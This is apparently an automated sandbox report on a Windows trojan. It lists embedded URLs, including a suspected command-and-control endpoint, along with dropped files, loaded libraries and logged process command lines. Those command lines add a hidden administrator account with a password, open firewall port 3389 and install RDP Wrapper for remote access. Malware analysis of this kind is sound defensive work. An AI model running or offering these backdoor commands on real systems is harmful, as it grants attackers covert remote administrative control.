                            Source: file.exe, 00000001.00000002.1800235734.0000000003021000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1800235734.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
                            Source: file.exe, 00000001.00000002.1800235734.0000000003021000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1800235734.0000000003017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgd
                            Source: file.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hansgborn.eu
                            Source: file.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hansgborn.eud
                            Source: file.exe, 00000001.00000002.1800155957.0000000002C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: file.exe, 00000001.00000002.1800155957.0000000002C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stascorp.co
                            Source: RDPWInst.exe, RDPWInst.exe, 00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.drString found in binary or memory: http://stascorp.com/load/1-1-0-62
                            Source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rdpwrap.dll.4.dr, RDPWInst.exe.1.drString found in binary or memory: http://stascorp.comDVarFileInfo$
                            Source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.drString found in binary or memory: http://www.apache.org/licenses/
                            Source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus.
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus/issues/115
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus/issues/54
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus/wiki/Bogus-Premium
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus:
                            Source: file.exe, 00000001.00000002.1800155957.0000000002C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
                            Source: file.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu
                            Source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu/core/receive.php4
                            Source: file.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu/core/receive.phpd
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://loremflickr.com
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://picsum.photos
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://placeimg.com
                            Source: RDPWInst.exeString found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                            Source: RDPWInst.exe, 00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.drString found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://via.placeholder.com/
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49711 version: TLS 1.2
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0118E6B81_2_0118E6B8
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0118DAA01_2_0118DAA0
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0118DDE81_2_0118DDE8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0040360C4_2_0040360C
                            Source: Joe Sandbox ViewDropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00406BE0 appears 36 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00404CDC appears 74 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00407450 appears 135 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 004042F8 appears 74 times
                            Source: RDPWInst.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (console) x86-64, for MS Windows
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBogus.dll, vs file.exe
                            Source: file.exe, 00000001.00000002.1800155957.0000000002C80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOpen.Nat.dll2 vs file.exe
                            Source: file.exe, 00000001.00000002.1799102756.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                            Source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerfxvmt.dllj% vs file.exe
                            Source: file.exeBinary or memory string: OriginalFilenameRDPCreator.exe4 vs file.exe
                            Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: file.exe, -Module-.csBase64 encoded string: 'HD6m0d7DIEQalT0TW1tIuCA0cF3vPOyaT4UIEmSE1e4IKPo2L3ob45cu'
                            Source: file.exe, UHJvZ3JhbUFB.csBase64 encoded string: 'jnFWQi68uQAR3M0vS+QCyLnlFala+ggYAZVWlv7mIS+GK8NY3VSHag==', 'UFpthHsvdUVL0UYJlWy4n+Vlr6vddNwOWtnzcUUZuiiMPDVzV2CPzFbsI8T0mvA3iDFG5HOU1Gc='
                            Source: file.exe, QXNzZW1ibHlMb2FkZXJB.csBase64 encoded string: 'VfX2eTxDUtnMJhxojnilizswzuewu53mrx6dat4gWTe/oTINPNL6RQ==', 'MQrhAKwmR1xV9fZ5PENS2cwmHGiOeKWLOzDO57C7neavHp1q3iBZN1oeNSMKvjOeoUtlJPCEK9IjecNa89yAoQ=='
                            Source: file.exe, UkRQSW5zdGFsbGVyQUFB.csBase64 encoded string: 'xPWeoXRHd0fstS/A+H3QztLCXfFzm4Nfr7VKurCcyrpHbvvg5mTxcLeNOTgrw5RNzpwxJXkNmHYjWMnCCmgLLw==', 'xPWeoXRHd0fstS/A+H3QztLCXfFzm4Nfr7VKurCcyrpHbvvg5mTxcLeNOTgrw5RNzpwxJXkNmHYjWMnCCmgLLw==', 'l0+56nIRagJt4xzMF7kVt3knU8ZHBmHzOcAHrJ084v9vRnkkI7Czvqstajx+An43jao8ALPAFSO5sWi0/RZTuN8vWJAWFkGQ1RAFphjJg2edJ/FstgGcNvnSuUDLI19HF6ZN+rlWcxM='
                            Source: file.exe, U3lzdGVtSW5mb0FB.csBase64 encoded string: 'St89mcW3WEdseLuZyJWeEM3LRG7XhIFUWer6pMI42tIXpk36uVZzEw==', 'St89mcW3WEe8WFznOzxH0WJw0krnXqZLbkF0AIBUqLMwDTpBt3c3jd7WCH4lP2dz', 'mUskmpmvZSNNu1aaHYZ2ShDrpmqZE45kyQ6CKN41yTsXpk36uVZzEw=='
                            Source: 1.2.file.exe.53a0000.1.raw.unpack, LicenseVerifier.csBase64 encoded string: 'vBgOPQiBhRR22ClUzIBJCmxcaOWfuAweUNpodRuZWDn8whviOe4JdA/sjzqw54KGh1qHJIc7JY5sGTCxNZQiSuyZQ6iHK2ykmU0Yb+QBvbqG33x2R7Di8MoNA1Tv2fX7SSny++IKEOQEEvwYhYr6oRU8sVItMcybUjiaaSw1rbU='
                            Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@30/9@2/5
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0043BF00 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,4_2_0043BF00
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0040FAE8 GetDiskFreeSpaceW,4_2_0040FAE8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0043DC64 LoadLibraryExW,FindResourceW,LoadResource,FreeLibrary,4_2_0043DC64
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0043B1A8 OpenSCManagerW,GetLastError,OpenServiceW,CloseServiceHandle,GetLastError,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,4_2_0043B1A8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
                            Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:576:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to behavior
                            Source: Yara matchFile source: 4.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
                            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: file.exeReversingLabs: Detection: 21%
                            Source: file.exeVirustotal: Detection: 34%
                            Source: RDPWInst.exeString found in binary or memory: Link: http://stascorp.com/load/1-1-0-62
                            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user PansyBins WelTW4HnaKt3 /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user PansyBins WelTW4HnaKt3 /add
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user PansyBins WelTW4HnaKt3 /add
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" PansyBins /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" PansyBins /add
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" PansyBins /add
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user PansyBins WelTW4HnaKt3 /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user PansyBins WelTW4HnaKt3 /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" PansyBins /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" PansyBins /addJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
